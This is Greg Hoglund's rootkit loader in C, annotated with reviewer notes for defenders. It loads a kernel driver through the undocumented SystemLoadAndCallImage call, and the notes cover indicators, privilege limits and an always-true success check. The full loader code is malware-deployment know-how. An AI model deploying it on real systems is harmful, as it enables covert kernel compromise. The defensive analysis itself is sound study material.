// New Deployment Module for rootkit 040
// -------------------------------------
// -Greg Hoglund
//  http://www.rootkit.com
//
// Reviewer notes (read from the defender's side):
//  * The program loads a kernel image by calling the undocumented ntdll export
//    ZwSetSystemInformation with information class 38
//    (SystemLoadAndCallImage) instead of going through the Service Control
//    Manager; this code creates no service/driver registry entry, so the
//    hard-coded on-disk path in main() is the durable artifact to look for.
//  * NOTE(review): this code path is believed to require the load-driver
//    privilege (an administrator), and on 64-bit Windows since Vista an
//    unsigned image would be refused by Driver Signature Enforcement; neither
//    is stated here — confirm for the OS version of interest.
//  * Success reporting is broken: see the NTSTATUS typedef below.

// The two header names were lost when this page was extracted (the angle
// brackets were read as markup). Presumably <windows.h> for USHORT/PWSTR/
// GetProcAddress and <stdio.h> for printf — verify against the original file.
#include
#include

// Local copy of the native UNICODE_STRING layout (Length/MaximumLength are
// byte counts — note the "/ 2" in the MIDL branch — and Buffer points at
// wide-character text), so the file does not need the DDK headers. The
// MIDL_PASS branch mirrors the SDK definition for the IDL compiler and is not
// used by a normal C build.
typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
#ifdef MIDL_PASS
    [size_is(MaximumLength / 2), length_is((Length) / 2) ] USHORT * Buffer;
#else // MIDL_PASS
    PWSTR Buffer;
#endif // MIDL_PASS
} UNICODE_STRING, *PUNICODE_STRING;

// NOTE(review): the real NTSTATUS is a signed LONG. Because it is declared
// unsigned here, the "(NTSTATUS)(Status) >= 0" test in NT_SUCCESS below can
// never be false, so main() prints "Rootkit Loaded." whatever ntdll returned.
typedef unsigned long NTSTATUS;
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)

// Function-pointer globals named after the ntdll exports they will hold; both
// are filled in at runtime via GetProcAddress in main() rather than linked.
NTSTATUS (__stdcall *ZwSetSystemInformation)(
    IN DWORD SystemInformationClass,
    IN OUT PVOID SystemInformation,
    IN ULONG SystemInformationLength
);

VOID (__stdcall *RtlInitUnicodeString)(
    IN OUT PUNICODE_STRING DestinationString,
    IN PCWSTR SourceString
);

// Input buffer for information class 38: just the NT path of the image to load.
typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE {
    UNICODE_STRING ModuleName;
} SYSTEM_LOAD_AND_CALL_IMAGE, *PSYSTEM_LOAD_AND_CALL_IMAGE;

// Undocumented SYSTEM_INFORMATION_CLASS value; the symbolic name is the
// author's convention and is not provided by the Win32 SDK headers.
#define SystemLoadAndCallImage 38

// Entry point. Resolves the two ntdll routines, builds the UNICODE_STRING for
// the hard-coded driver path and asks the kernel to load and run that image.
// Non-standard "void main": the process exit status is 1 when an export
// cannot be found, otherwise unspecified.
void main(void)
{
    ///
    // Why mess with Drivers?
    ///
    SYSTEM_LOAD_AND_CALL_IMAGE GregsImage;
    // NT object-manager path ("\??\" prefix), not a Win32 path. Fixed
    // location: a file at this path is the simplest host-based indicator for
    // this particular sample.
    WCHAR daPath[] = L"\\??\\C:\\_root_.sys";

    //
    // get DLL entry points
    //
    // exit() comes from <stdlib.h>, which is not visibly included; this relies
    // on an implicit declaration (accepted by pre-C99 compilers only).
    if( !(RtlInitUnicodeString = (void *) GetProcAddress(
            GetModuleHandle("ntdll.dll"), "RtlInitUnicodeString" )) )
        exit(1);

    if( !(ZwSetSystemInformation = (void *) GetProcAddress(
            GetModuleHandle("ntdll.dll"), "ZwSetSystemInformation" )) )
        exit(1);

    RtlInitUnicodeString( &(GregsImage.ModuleName), daPath );

    // "if NT_SUCCESS(...)" compiles only because the macro expansion is itself
    // fully parenthesised. See the NTSTATUS note above: this branch is always
    // taken, so the two messages do not reflect what the kernel actually did.
    if NT_SUCCESS( ZwSetSystemInformation(
                     SystemLoadAndCallImage,
                     &GregsImage,
                     sizeof(SYSTEM_LOAD_AND_CALL_IMAGE)) )
    {
        printf("Rootkit Loaded.\n");
    }
    else
    {
        printf("Rootkit not loaded.\n");
    }
}